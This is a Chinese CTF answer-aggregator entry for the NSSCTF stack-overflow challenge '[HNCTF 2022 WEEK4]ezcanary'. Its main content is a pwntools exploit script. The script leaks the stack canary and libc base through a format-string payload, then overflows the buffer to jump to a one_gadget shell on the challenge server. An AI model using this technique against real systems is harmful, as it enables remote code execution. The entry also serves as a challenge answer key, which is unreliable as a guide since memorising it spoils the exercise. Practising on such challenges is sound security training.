[随波逐流]CTF Flags

随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
返    回

[HNCTF 2022 WEEK4]ezcanary

 广告模块
ID: 11377
标题: [HNCTF 2022 WEEK4]ezcanary
描述: None
类型: 栈溢出
网站: NSSCTF
题目链接: https://www.nssctf.cn/problem/3102
赛事: HNCTF
年度: 2022
Flag值:
writeup: 验证后的网址
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote('node5.anna.nssctf.cn',28441)
payload = b'%51$p.%53$p'
p.sendafter(b'name:\n',payload)
canary = int(p.recv(18), 16)
libc_base = int(p.recv(12), 16) - 0x29d90
payload = b'a'*(0x110-8) + p64(canary) + p64(0) + p64(0x40101a) + cyclic(64) + p64(libc_base + 0x4526a)
p.send(payload)
p.interactive()
https://blog.csdn.net/Xzzzz911/article/details/133152627
答案错误,我要更正